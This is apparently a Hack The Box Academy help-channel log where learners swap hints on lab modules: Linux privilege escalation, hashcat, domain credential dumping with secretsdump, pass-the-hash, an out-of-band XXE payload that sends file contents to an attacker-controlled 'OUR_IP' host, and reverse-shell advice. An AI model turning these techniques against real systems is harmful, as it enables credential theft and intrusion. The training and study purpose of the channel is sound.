Understanding Log Sources & Investigating with Splunk
Intrusion Detection With Splunk (Real-world Scenario)

Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all data any suspicious loads of clr.dll that could indicate a C# injection/execute-assembly attack. Then, again through SPL searches, find if any of the suspicious processes that were returned in the first place were used to temporarily execute code. Enter its name as your answer. Answer format: _.exe

I just found the answer but i'm not sure to understand it

If someone can dm me it would be nice 🙂

Hey all, I'm looking ot get some assistance if at all possible please!

I'm currently running through the Privellage Escalation Section, within the Getting Started Module. My current task is this:

Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'.

I'm a little confused though, using https://gtfobins.github.io/ I'm unable to find a bash escalation that won't require the user2's password.. I cannot generate SSH keys, so unsure on how to proceed really.

Thanks in advance

check other methods mentioned in the section

I'm assuming I should try to run linPEAS to show what options I have?

Perhaps

everytime I do ./linpeas.sh I get

ser2@ng-1120156-gettingstartedprivesc-wecbz-dbf67949b-jlznq:/home/user1$ ./linpeas.sh
bash: ./linpeas.sh: No such file or directory```

Am I being stupid and missing the obvious?

no such file

^

You need to transfer it

Why would it make me do that, when the next section I'm due to cover is transferring files? 😄

It goes over basic file transfer stuff in this section

Not in Priv Esc it doens't?

In the module, I believe it does

Something about python3 -m

In the module it does, yes. But that is my next section AFTER I complete Priv Esc, so it seems odd that I would need to do file transfers prior to learning about it.

You can also see if you can see things with user that you shouldn't

When I do sudo -l as user2, I get prompted for a password

if it do it as user1, I get /bin/bash as user2 without password needed.

and this is where I'm now stuck 😄

There's more to enumerating than sudo -l

This is a hint btw

This is getting started, privesc

Idr any suid binaries user2 has access to

But if you look hard enough, you can find some interesting files

But they may be hiding

I'm trying 😄

It might also help if you start at user2's home

So I'm very new to Linux, to get to home, would I just do

sudo -u user2 /home/

Nope

Since you're already user2

Just do cd

Do linux Fundamentals/information Security Foundations path. It'll build you up for a lot

ok ya

I have the flag for part one, from the home

but the next task is this:

Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'.```

As a LOT of modules assume basic working knowledge of linux

fair, so maybe a pause and go learn linux 😄

Hint you want to list all files in a directory

And most users (including root) will have this hidden directory

oh im an plonker, so I did ||ls -a|| and now I see ||.bash_history||

That might be useful, but there's a hidden directory that should also catch your attention

ahh. I was looking in user1 still

Quick things to note for Navigation, cd or cd ~ brings you to your current user's home directory, cd / brings you to the root of the filesystem

Thank you.

So I'm looking at all files for User2, the only one that catches my attention is .bash_history but it only contains my commands, so should I be looking at .vim or .viminfo?

^

Hidden directory, not file

Think about what connection you used for user1

okie doke

Also fwiw, directories will have a trailing /

So i used SSH for user 1, right, then sudo as User2. Searching dir's on User 2, I've got to the Bin folder.. I feel like this is the wrong place though, as it doesn't feel too hidden. going into the root and trying to
vim flag.txt

I get permission denied, so I still need to work out how to PrivEsc

You can't view files if you don't have permission

But maybe snoop around in the root dir

There's a hidden directory there too

ahh

And you'll be shocked when you look inside how "easy" it'll be from there

I think I found it 😄

https://tenor.com/view/defending-depo-gif-26439268

holy nuggets man, I apologise.. you guys must be like this.. ^

¯_(ツ)_/¯

Only thing I'll say is the linux fundamental course is a bit clunky - so don't feel bad if it's not immediately clear

The more I use linux, the better I get 😄

I honestly appreciate you guys' patience with me

But in one of the sections they give you all/most of the commands you'll need

awesome, to download the file, I'm assuming I need to use scp?

You can do scp, or read it with cat and copy/paste

[Note for terminal you need to add <shift> to the normal copy/paste keybind]

yes, thank you.

What is chmod 600 id_rsa

check the SSH Keys part in that section, it's explained

ok, and when it came to the keys, should I have just copied the id_rsa, or the id_rsa.pub, because when i try the command

ssh root@83.136.250.104 -i id_rsa

or 

ssh user2@83.136.250.104 -i id_rsa

I'm getting this error

root@83.136.250.104: Permission denied (publickey).

You need to specify the given port

oh ignore me

Yeah, I needed to use chmod 600 to change perms, then login as root. So I think I've solved this one

thanks again!

Gg

It only took me 1.5 hours 😄

Understanding Log Sources & Investigating with Splunk
Intrusion Detection With Splunk (Real-world Scenario)

Any tips for this question ?

Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through SPL searches against all data the two IP addresses of the C2 callback server. Answer format: 10.0.0.1XX and 10.0.0.XX

Just tried a dumb query || index="main" EventCode=3 SourceIp=10.0.0.* DestinationIp=10.0.0.*
| dedup SourceIp, DestinationIp
| table SourceIp, DestinationIp || but the answers doesn't work

I still haven't found it

It'd be interesting if you could count based on volume?

stats count by?

Up until now the passwords I've passed into xfreerdp haven't needed single quotes, it's odd that one one occasion i couldn't get into a machine because I was missing quotes

I still find the quote thing confusing. Especially when you’re copying keys to get in and they’re not exactly the same because the ones you copied have hidden characters. I’ll never for the life of me remember when or why this happens but it’s something I keep in the back of my mind each time I’m copying keys over that are supposed to work but don’t

things inside single quotes will be treated as literal string

👍

How to decode SHA1?

hashcat or maybe https://crackstation.net/

oh thank you

After 2 grueling days of persistent determination i amfinally past the kerberos part of password attacks

gg

I'm doing the Hashcat module https://academy.hackthebox.com/module/20/section/113 and for some reason Hashcat just runs, puts out some process information and stops without attempting anything.
I did echo <hash from question> | tee hash which shows up correctly.
But then even basic stuff isn't working:
sudo hashcat -a 0 -m 0 hash /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt
which I did as part of the previous exercises. I'm at the point where I've tried obvious stuff and nonobvious stuff so I must be missing something fundamental 🤔
I know there are several possibilities for the hash ID and I've tried a fair number of them with the same result.
Output:
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 LINUX) - Platform #1 [Intel(R) Corporation]

• Device #1: AMD EPYC 7543 32-Core Processor, 7854/7918 MB (1979 MB allocatable), 4MCU

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #2 [The pocl project]

• Device #2: pthread-AMD EPYC 7543 32-Core Processor, skipped

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

INFO: All hashes found in potfile! Use --show to display them.

Started: Fri Jan 12 07:49:24 2024
Stopped: Fri Jan 12 07:49:24 2024

it's been cracked before

INFO: All hashes found in potfile! Use --show to display them.
use that

it's empty 🤷‍♂️

$ hashcat --show
Usage: hashcat [options]... hash|hashfile|hccapxfile [dictionary|mask|directory]...

Try --help for more help.

unless there's some other option i'm missing

oh did I already crack it?

--show with the hash file

ahh

let me give that a go

yes, that's why it's been added to the potfile

right, so --show doesn't just list them all, you have to specify

it needs to know what hash you want it to show, you can always cat the potfile to see the whole list

that's great functionality. It means you don't go re-cracking stuff you've already cracked 👌

hashcat is a great tool

hm, the .hashcat/hashcat.potfile file is empty 🤔 and giving it the hash in the --show command returns nothing

(unless I'm in the wrong file. It exists though)

hm try with --potfile-disable

do you mean the original crack? or the --show?

with your original command, just forcing it to crack again

great, I've got more, and different output this time 💯

Hooray, it tried! Exhausted, but that's cos it's probably the wrong hash ID 🙂

thank you so much for your help. It gets me going again, but I'm still keen to understand how this happened. Is it worth destroying the potfile?

not sure, but you should use your own hashcat next time, don't use it in a vm

That's a great tip. Very grateful for your help 🙇

I will take a guess and say you should use mode 1000

I saw NTLM down the list of hashid and thought I should try that one next, that might be meta-thinking cos it was the more recent mode example 😆

oh yes that is mode 1000

great!

those hash ID tools don't work well with raw hashes, this will be your best friend https://hashcat.net/wiki/doku.php?id=example_hashes, most of the time you would know what hash you're working with though

Noted ⭐

Got it 💯 thanks for unblocking me!

hi everyone, how to launch the python debbuger in STACK-BASED BUFFER OVERFLOWS ON WINDOWS X86 please ? There is no explanation about it, just "place a breakpoint before s.send(buffer)". I tried in idle and in pdb but the fonction s.send is not recognized.... Thanks

Hi Guys, I'm doing the "What attack can this user perform?" of skill assessment 1 of AD Enum / Attacks module, but i'm curious to knnow what's best approach here. I've tried to run sharphound from the sql powned account (via evil-winrm session on MS01), got some c# tracebacks. Not able to login with the other domain account that we find. I've switch to bloodhound-python to collect info, but I get a lot of DNS timeouts (I use the DC 172.16.6.3 as ns server). Should I go with powerview and check stuff like acls ?

the best approach would be to get the collectors working

any domain joined account should be able to run the collectors

I was not able to login with the user I found via WinRM

└─$ evil-winrm -i 172.16.6.50 -u tXXXX
Enter Password:

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1

not every account will have winrm access

nonetheless I got the info I needed with bloodhound-python, but just curious to learn if there's other way to achieve this

and if it's expected that sql service account user can't run sharphound 🙂

you can use powerview or specifically search for users with ||DS-Replication-Get-Changes|| or ||DS-Replication-Get-Changes-All|| right

*Evil-WinRM* PS C:\tmp> .\SharpHound.exe
2024-01-12T04:06:09.4466436-06:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2024-01-12T04:06:09.6340680-06:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, CertServices
2024-01-12T04:06:09.6652742-06:00|INFORMATION|Initializing SharpHound at 4:06 AM on 1/12/2024
2024-01-12T04:06:09.9777776-06:00|ERROR|Error running SharpHound: Exception getting LDAP connection for (objectclass=domain) and domain INLANEFREIGHT.LOCAL
   at SharpHoundCommonLib.LDAPUtils.<QueryLDAP>d__40.MoveNext()
   at System.Linq.Enumerable.<DefaultIfEmptyIterator>d__93`1.MoveNext()
   at System.Linq.Enumerable.FirstOrDefault[TSource](IEnumerable`1 source)
   at SharpHoundCommonLib.LDAPUtils.TestLDAPConfig(String domain)
   at Sharphound.SharpLinks.TestConnection(IContext context) in D:\a\SharpHound\SharpHound\src\Sharphound.cs:line 148
   at Sharphound.Program.<>c__DisplayClass0_0.<<Main>b__1>d.MoveNext() in D:\a\SharpHound\SharpHound\src\Sharphound.cs:line 532
--- End of stack trace from previous location where exception was thrown ---
   at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
   at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
   at CommandLine.ParserResultExtensions.<WithParsedAsync>d__20`1.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
   at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
   at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
   at Sharphound.Program.<Main>d__0.MoveNext() in D:\a\SharpHound\SharpHound\src\Sharphound.cs:line 406

Exception getting LDAP connection for (objectclass=domain) and domain INLANEFREIGHT.LOCAL
are you running it as a domain user?

I run with the sql service account. Guess that was the issue

Can you switch user via winrm ? I tried :

*Evil-WinRM* PS C:\tmp> runas /user:txxx cmd.exe
Enter the password for txxx:

but can't type the password

anyway, I got all working with the bloodhound python collector, but this one seems old so while this work here, want to make sure I learn other methods

runas will open a window, not switch the current session, if you don't have gui access it won't work

If it exists, what the module name?

use the search functionality

I used it

¯_(ツ)_/¯

I didn't find anything

¯_(ツ)_/¯

one last question, i'm trying to crack admin password, however can't do it with rockyou wordlist. Any pointers ? (maybe I did sth wrong)

┌──(babadmin㉿kakali) - 11:30:25 - [/opt/bloodhound]
└─$ secretsdump.py -outputfile inlanefreight_hashes -just-dc-user administrator INLANEFREIGHT/txxxx@172.16.6.3
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:AAAAAAAAA:BBBBBBBBBB:::
┌──(babadmin㉿kakali) - 11:30:45 - [/opt/bloodhound]
└─$ echo "BBBBBBBBBBBBB" > /tmp/adminhash

┌──(babadmin㉿kakali) - 11:34:27 - [/opt/bloodhound]
└─$ hashcat -m 1000 /tmp/adminhash /usr/share/wordlists/rockyou.txt

Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 1000 (NTLM)
...

why do you need to crack it?

Oh now you say it, I can just pass the hash 🤦‍♂️

I'm not use to the fact NTLM is such as poor design you can use hash as password 😄

Thanks a lot @next bronze got that one complete now

Hello to all i need a little bit of help im doing the linux fundamental module and im in the filter content section.
the first question is
"How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)"

i used the command : ss -l |grep "LISTEN" | uniq | wc -l

You're grepping everything that is listening.
This is what I would do:
||netstat -tpln |grep -v "127\|tcp6" |grep tcp |wc -l||

hey how do i turn on light mode in the website academy?

Hi! I have question about module "Attacking Common Applications -> Attacking Applications Connecting to Services".
How did we know that the breakpoint should be set to 0x5555555551b0? There is no such thing in the output of disas main

Use a browser plugin or copy the content of the website to Obsidian. In Obsidian you can then choose the theme yourself

why not simply ss -l | grep "0.0.0.0:" |wc -l

Hello. Did you find the answer?

nope 😂

you need to run it first

b _start
r
disas main

I have a question regarding Information Gathering - Web Edition, specifically how one can figure out Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer.. I did get it right by accident, but honestly that was just luck. I want to understand how the answer to this question would be found out legitimately. Sadly, I coulnd't find any writeups answering my question on the internet.

When I retrieve the zone transfer/axfr record from the provided dns server using dig inlanefreight.htb @IP axfr I get this response:

; <<>> DiG 9.18.18-0ubuntu0.22.04.1-Ubuntu <<>> inlanefreight.htb @IP axfr
;; global options: +cmd
[...] various A records, one NS record and two SOA records

The reason I than accidentally guessed the number of zones was that I believed inlanfreight.htb and root.inlanefreight.htb from the soa record were a each a zone. However, as I understand root.inlanefreight.htb is really just the email address of the administrator, where the @ is replaced by a .. So how would one figure out the answer to this question?
Is it because there are two soa records in the zone transer? But both soa's are equivalent, my understanding is that zones are used to delegate the management of (sub)domains to another authoritative nameserver.
My other guess on how to answer this question would be to query each of the fully qualified domains listed in the zone transfer for their nameserver. The number of unique nameserver would then be the number of zones, no? However, I am not quite sure if this would work and this technique (if it does indeed work) was not discussed in the learning material which would be quite strang for Hack the Box academy.

As a side question. How would one figure out zone information if zone transfer requests were (as should be) not answererd? Not at all?

please omit the output from dig

I believe that the SOA records are just for the current zone you attempted to zone transfer, i.e. inlanefreight.htb. There should be some subdomain records within that zone that reference a name server with the loopback address, meaning that these are separate zones who also exist on this DNS server (for example: sub1.inlanefreight.htb NS 127.0.0.1). If zone transferring is not enabled you can use something like dnsrecon or other tools to brute force subdomain records and get a valid list. At least this is what I remember from doing it a while ago, I could be wrong on some of those points

Thanks for your answer! There is indeed a record for the second zone domain sub1.inlanefreight.htb in the zone transfer file pointing to 127.0.0.1. However, it's an A record rather than an NS record. I don't quite understand why.
Regarding fuzzing for subdomains: we would find out which domains exist. Can we find out which zone a domain belongs to without having access to zone transfer files? As I understand thats supposed to be internal information for administration only, but I am not totally sure on that.

If it is an A record than that record is for the name of the nameserver itself. I assume that the entry is something like ns1.inlanefreight.htb. I am not sure exactly what you mean by the second question - I believe if a domain or subdomain is found to have an SOA record then a zone by definition exists for it on the DNS server.

I.e. the zone 'is' the discovered domain

^

Subdomains can be hosted as a vHost (multiple subdomains under the same ip). Or as separate ips entirely

Cloudflare has an article someone linked in here recently explaining dns

If you ping too many people the bots get mad

Hi all, anyone have tips for the skill assessment in " Stack-Based Buffer Overflows on Windows x86" ? I'm trying to fuzz the program with the python script but i can't have access on the Windows machine for debugging. (to see when eip is overwritten) thanks for the help

Thank you very much 🙏 @manic onyx @fathom pendant

you need at least a windows vm to test your exploit

Hello yalls, I'm doing the Windows Privilege Escalation - SeImpersonate and SeAssignPrimaryToken module, and I understand what I'm supposed to do, but whenever I run enable_xp_cmdshell it will start, and then it will disable itself after the first command I run, or it won't enable at all, or it will disable after a very short time. I tried waiting and then enabling it again, I tried disabling and then enabling it again, but the only thing that works is refreshing the target. I saw online that the "solution" was to change configurations on the backend which I obviously don't have access to.
Is this a common problem with some sort of workaround, or am I blatantly missing an instruction?

Hey all. General question:

Do you need to download a separate ovpn file for every room/box to connect to your vm and can you not connect to some rooms with your vm? I'm just beginning and I'm attempting to do the "using web proxies" room on the bug bounty path

no, one vpn file works for all targets

ok, thank you. I'm trying to use the pwnbox but it's running very slow and zap hud buttons aren't responding.

for pwnbox you don't need to connect to the vpn

wdym it disables itself? once it's enabled it should stay enabled

I don't know if it's actually disable that's just what i think, but regardless it just stops showing output. When I enable it at first, usually the first command will output the expected results, then after that I input a command, and get no response, just a new line

@acoustic owl did you have any issues trying to access the vhost api.vulnerablesite.htb:<port> for the CORS misconfiguration section for xss and csrf? I keep getting the apache default page.

it works fine for me, never seen it happen

well if the first command works, send a revshell and work from there

That probably would have worked, reinstalling impacket also worked. Thank you

Hi, can someone give me some pointers for "Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain." in the assessment 2 of AD Enum & attacks module ? I dumped domain credentials and ran GetNPUsers.py but haven't found anything. Not sure what other method expose "weak credentials"

the "weak credentials" themselves expose weak credentials

Hello, is there a way to use another program or plugin than ERC with x32dbg for identifying bad characters plz? I find only '0' when i compare the ByteArray_1.bin file in x32dbg. Thank you 🙂

not sure what that means 🙂

try some

Ok I got it, it was same as one of the example in the module, but in real life would be quite lucky 😄

A colleague of mine and myself have a problem, i keep spawning the target machine but the ip address does not show on the academy platform it just loads and goes back to " click here to spawn target" we've both only encountered this problem on the academy platform

any ideas on how to fix this ?

hello is there someone that can get me a hint what my error is on the source code for Broken Authenticaiton - Predictable Reset Token ? i dont get it

happens to me as well, wait 5 mn, refresh the page, and click spawn again. I believe if the machine is already spawning it will not restart that process. Anyway after a few try vm is up

alright thanks lemme give that a try

also try disabling adblock and use a different browser

send me a dm

I am super stuck on the Understanding Log Sources & Investigating with Splunk Module. The instructions want you to install the sysmon app for splunk but the pwnbox cant seem to log into splunkbase however I can on my own system. Any thoughts?

is there another easy way to get the app files to the pwnbox?

i figured it out by grabbing it from github

is anyone else having issues with the Advanced XSS and CSRF Exploitation labs? I cant even log into the guestbook for the xss portion with the provided credentials, but 'lab warm up' works

any idea why I am facing this issue??

context?

just want to run a ping sweep on the target. I am in the meterpreter section of pivoting and tunnelling module

pinnnnnnng sweep!

??

do it with nmap

why did I not think of it before

I just remember that scene from that movie about edward snowden one day I was just trying to look at some nmap command he was running

and it was a ping sweep. figured it oculd be useful

never done it though

🫠

if you dont have a clue what youre talking about then please dont give advice to people working on modules. Its not helpful and just may make things harder for them

I actually have a clue, relax cowboy.

Lol

https://academy.hackthebox.com/module/136/section/1280 - when I hit CTRL+SHIFT+K and try to view this it just says undefined

brother you havnt done a ping scan before

thats literally first day of Newbie Hackers 101 orientation

and to be clear its okay to be a newbie, just please dont interfere with learners

nmap -sn ip/mask ^----no, thank you for reiterating that I've never done this. Predominantly because I haven't had to.

I also happen to know a lot about nmap, don't be so quick to jump the gun on people, you'll hurt yourself in the future

Sure sure mr had to look up what a ping sweep was after watching a movie.

hacking wordpress skill assesment, im a bit lost, so any hints are welcome

It's where I first heard of it, I'm sorry that you tunnel vision how people learn about the world and other subjects.

arrogant shit.

You have never done a ping sweep?🤔

Search Google for this type of vulnerability

google

Missing my point. But sure think Im arrogant if you want. This has become off topic for module discussion anyways. If you have a module related question to ask Im usually happy to help 👍

You literally offered the guy who asked about it nothing for 19 minutes straight. So if you wanna burn someone, it ain't gonna be me.

Huh?

read #rules then #welcome

oh

yeah keep it legal? is that what u refer to?

? ^

no

What is then wrong by what i typed?

i think the other guy was specifically trying to do a ping sweep through his metasploit pivot and not nmap

i didn’t say anything was wrong little man

it doesn't have anything to do with #modules

read #welcome and verify your account and you can ask elsewhere in the server

oh i see sorry but i couldnt find a chat..

ok

because you haven't read #welcome yet

I know, its silly they show this chat to unverified users too

getting somewhere, now doing Password Attacks 🙂

so you skipped pw attacks?

good luck btw

yes before doing the path i was picking modules randomly by interest, but few weeks ago i enrolled this cpts path and doing it in order, now i reached pw attacks 😄

🗞️

how is it going for you marcie

been busy with life

Hello 😄

in which Module is this covered xD

fun fact there's a general channel if you look hard enough

i think those are spam bots

<@&861185840277487616>

yes; and antisemitic

i cant tell, my english isnt that well to recognise this

it's a word that defines as people or actions that hate jewish people/activities

you can use nmap in the msfconsole, put results in the db.

doesnt matter anymore though just let the topic go.

you'd have to link a db to msfconsole

¯_(ツ)_/¯

I am doing the web attacks skill assessment right now and am a bit stuck. I have enumerated all user info and have access to all accounts but am not sure how I should 'elevate my privileges'... I am aware of the api and all attempts to update any user information don't seem to work... I have a feeling I need to update the name and company fields to achieve XXE injection but I am not sure how to do this for any user. I wrote a script to authenticate as every user and then attempt to update the API but nothing changed. I also noticed that the token is returned in JSON so I attempted to update that as well but didn't see any success. How should I identify the administrator user, if there is one?

which endpoints from the API did you find (there are multiple needed for this assessment)

user and token. Are there more?

I didn't find any within the traffic but I suppose I can fuzz it

reset.php

I messed around with that but I'll take a look again

thanks

and as you said, username and company + verb tampering

and have closer look at all users you enumerated, you only need one @manic onyx

damn yeah im blind lol

ok got it, thank you man I was in way too deep on that lmao

got the account?

No I got the flag

nice

i enjoyed this module so much, its so well done

I agree, I have explored these before but not chained together and in a cool way

Especially the XXE bit

yes the chaining of IDOR, Verb Tampering & XXE to get the flag is so cool

my function is not called checkfile().

did it change to validate() instead of checkfile()?

I will assume yes, that module needs an update. I figured it out.

Just finished the Pivoting Module and I have to say, I'm extremely glad I've been reading this Discord. Ligolo made it such a breeze in the end

which module and section?

did you read the question at all?

oopps wait, my bad

I thought that was the instruction 😐 sorry newbie here 🙂

my bad, i need to bruteforce the password :)) thanks for the response anwys

Does any one know What i gotta do at the "Credential Hunting in Linux" task of the "Password Attacks" module to get in the system? i have tried brutforcing (using the given username and password list), default creds on the FTP and SMB services. still am not able to get in, i did look at the hint but that gave me the username and password outright. How is one supposed to get it without having to use the hint?

did you try the mutated list? (also check the hint iirc)

also it's not the password outright

username; not generally sure (but if you look at the previous section with the user, you can check /home/ for users

and create a list off that

hmm alright

ill look into it

also; the mutated list and creds are reused a LOT in this section

thanks for the hint

so save creds when you find them

similar thing with the windows machines: C:\users will save a bunch of time

been at this module for 3 days now its taking way too long, no idea why it shows "8hrs"

moar threads

-t 48 helps :)

been doing 64

it drops after the first few mins tho

(also the creds for the will are hiding behind another user, damn browser stuff)

64 can be unstable

48 is more stable and doesn't tend to drop as many

alright

will do that

if you don't wanna use the provided pw to create a separate mutated list: the mutated wordlist you created earlier will work

but also lowercase usernames

👍

ls

hi

Could someone help me solve the bizness machine?

please

wrong channel

read #welcome on how to access more of the server

hello, for here I have to crack the hash?https://academy.hackthebox.com/module/112/section/1245

yes; you have the mode; just need the wordlist supplied by the module

the mask is ONLY for specific cases

but the mode is still gonna be the same

because metasploit finds me by matching the hash directly, as shown in the example

ahhh

read the question

"what's the account's cleartext password"

so you'll have to crack it

this is normal ?

finished the attacking password module. I never wanna do that again ever.

lol best thing i done that i never wanna do again

try --wordlist=

there's a hashcat mode you can use; and 2 the wordlist is provided by the module iirc

just substitute the ?1?1?1?1 mask with the wordlist

the mask is just specifically for HP iLO ipmi, but the mode is for all ipmi hashes

a fair tip @marsh echo don't use rockyou.txt in the module; iinstead use the lists in resources or a mutation of the p list.

this calls for a celebratory jolly rancher

the easy lab was actually the hardest for me.

that's a common sentiment

they're mostly borrowing the difficulty curve of the main platform labs

ok thanks a lot all I'll see how to do it and then I'll go to sleep 😉

it's given to you in the module

literally everything up to the ?1?1?1?1?1 can be used for it

i see thanks 🙂

that example is just saying in the specific instance of HP iLO machines (Which this IPMI hash is not from) the ?1?1?1?1?1 mask works better than a dict

we agree that the hash is admin : x : x

?

It should be whatever msfconsole gave you

yessss i find the hash but ...

hashcat -m 7300 hash wordlist

This command is incorrect

The ?1?1?1?1 is a mask

Which is NOT NEEDED

As I've said several times already

But you should have a wordlist provided by the module to use

the hash is that last part of the admin:...... starting from 3a

i think

sometimes hashcat is dumb, sometimes its user error ¯_(ツ)_/¯

aaahhh ok i understand better

The initial error is literally as I described, using the wrong method

This doesn't require a mask at all

oh he's doing the footprinting module!

Yup

use metasploit not john the ripper

It got me too the first time and then I reread

Metasploit is to grab the hash

It doesn't automatically crack it

Only if it matches some known defaults

@fathom pendant give me cpts

I don't even have it

;x

I don't see what the problem is, guys :/ sudo hashcat -m 7300 hash.txt footprinting-wordlist.txt

the hash is wrong, make sure to copy the whole thing

can someone explain me my error on the Module Broken Authentication - Predictable Reset Token . i treyed really al i know i need some one that can check my code and try it on his site. to see if im the problem 😄 anybody have done it allready ?

Hello, i'm on the final task on "STACK-BASED BUFFER OVERFLOWS ON WINDOWS X86", when i need to find the bad characters, i launch the "ERC --compare ...." command after "ERC --bytearray". But i have only "0" character on the second line "From Memory Region", i can't compare the bytes at the ESP address with the ByteArray_1.bin file.
Any idea please ?
Thanks

Does anyone have tips on how to improve the VPN experience? Recently i often times need to switch to attackbox, wich is kinda annyoing.

Use the tcp download

Ok, bye everyone, i'm searching for a good site to learn Penteesting WITH more pedagogy than here, a lot of course are poorly explained and we take a lot of time just to understand the question. Good luck all

Good luck

hello everyone, i am checking XXE and i have a question: why we cannot just have this xml "<!ENTITY % oob SYSTEM 'http://OUR_IP:8000/?content=%file;'>" but we have to use double entities as follows <!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">?

Maybe try Try Hack Me. Or maybe TCM

Tbh, there is nothing better on the market, I've done TCM, TryHackMe, and OffSec's OSCP course. No other resource is as detailed and in-depth as Academy.

If you're doing CPTS and struggling, then you're most likely missing fundamentals.

I saw that they're doing the windows BOF module, which I agree is not great. the cpts modules are a lot better tho

can i get a hint with https://academy.hackthebox.com/module/112/section/1066 2nd question - i see flag.txt but don't have access

I didn't see that part, but I'd also bet it's much harder if you're missing some fundamentals and don't have experience

that is true

nvm i got it 🙂

I was about to ask how you're missing access 😄

As far as I remember that section does not provide any specific credentials either

or not

What kind of problem are you having? Can you show me the command(s) you are entering?

i got ftpuser's creds

but still cant get flag.txt

hrm

Which credentials are you using exactly? There is a way to access the FTP server with no specific password

i can access with anonymous and ftpuser

And what command are you using to try and read the flag once you connect with let's say "anonymous"?

get flag.txt

That should work ^

Try resetting the target if it does not

ftp: Can't access `flag.txt': Permission denied

Try running ftp as sudo

Or ftp from your home folder, should be fine too

nobody have time for a sanity check?

@chrome lotus oh derp.. was my local permission then.. thanks heh

No problem!

Hello hackers, I am working on nmap module. I am really confused about faking a source IP part. I really dont understand why the second one makes sense. When faking an IP address in nmap, the response of the target machine should be routed to the faked IP address rather than the attacker machine(The one I am using now), so why can I get more info than the one without specifying a faked IP?

The Windows Privilege Escalation - Windows Server box seems to be quite buggy. Not only the smb_delivery used in the module does not seem to work but also other methods of file transfer (tried certutil, iex(new-object net.webclient).downloadFile(...), raw SMB server with impacket and net use, xfreerdp with a drive) fail as well.

Both HTTP and SMB connections to my host all seem to time out. What the hell is going on in this box?
Edit: sure I resetted the box already
Edit x2: no I dont have any firewall rules on my side

maybe because it's running windows server 2008, thing's old. smbserver works for me

how did you access your share? tried for example copy \\ip\share\file.exe .\here with no success

I can dir it no problem

I can dir it too

but no copy or exec

check the commands you’re allowed to run as sudo 😉

works for me

Anyone can help with: https://academy.hackthebox.com/module/80/section/779

Q2: Request a reset token for htbuser and find the encoding algorithm, then request a reset token for htbadmin to force a password change and forge a valid temp password to login. What is the flag?

I already found the the encoding, but stuck after that.

I tried to bruteforce the password for htbadmin but no success.

Any idea how to deal with this ? 🙂

TIA

use the forged valid temp pass as the password for the htbadmin user

yeah for me it creates a file with 0 bytes but then times out. Cant finish the module due to this frustrating box now

reset

what do you mean forged valid temp pass, how will i able to know that

can i dm you ? @lusty thicket ?

yes

just reproduced your test, I can indeed copy a little text file (5 bytes) but larger files time out :/

looks like the problem is your side, try resetting

have some time to help me ? need to take the last question for the Bug Bounty Path. Broken Authentication Predictable Reset Token Question 1 . i really run out of ideas what my Problem is.

1. Epoch time used with different Time zones
2. Fetch the date and use the same date on the Target Headers
3. run the Python script over Threads if the file gets deleted fast
   and so on...

if some have time i can share my code dont want to spoil it here.

thanks guys really want to finish this Path for the next machine release today

Ended up using the pwnbox, no problems there 😄

hey guys, maybe some can help me...

If I'm pivoting on port 1080 how can I capture the request on subnet host through burp?

for example:
pivot host: 172.16.8.50
target host 172.16.8.80:8080

just put burp before your pivot

What do U mean before?

assuming youre using proxychains yeah?

right...

well, what do you think the chain in proxychains refers to 😉

run as root using the sudo policy bypass technique covered in that section

you can chain proxies

burp is just another proxy

U mean to set the socks in burp?

you can, or just add burp to your proxychains config

Hi guys, when preforming a zone transfer on domain X and ns Y, and we get the results, now is there a straightforward way to know the number of zones on the NS (if this is correct to say);
or one have to do another axfr query on each returned FQDN to know the number of zones?

you cannot recognize the number of zones only on the basis of records received back

https://www.cloudflare.com/learning/dns/glossary/dns-zone/

Hey guys I am trying to ssh to a target. But the machine is always unreachable

I'm checking this but need to write the script first

I am doing Linux fundamental

not sure what u mean,

the socks5 proxy didn't worked out for me ....

burp is using http/https proxies right?

right

just add 8080 after the 1080?

I havent tried using burp over a pivot before, but at least u could try

Can send you mine of you Need

no sure what u mean,
I'm trying but without success.
That Y I'm asking, If it would work then the Q is kind of pointless don't u think?

hi pls what is proxy ?

As far as i know you can setup proxychains inside of burp, thats using socks5. Ofc u need to start tunnel to pivot by your own

https://en.m.wikipedia.org/wiki/Proxy_server

thank toy so much

I did, something is missing ...

I did tunnelling (that's Y I can see the web which is in subnet) but I can't get the config of the socks5 in burp...

Did you try a dynamic tunnel? Bc the pivot most likely doesn’t have a listener on 8080

https://romanenco.medium.com/tunnel-traffic-through-jump-host-988797fea588

Hi all, is there any equivalent of snaffler that runs in linux ?

did it ...

also followed this one:
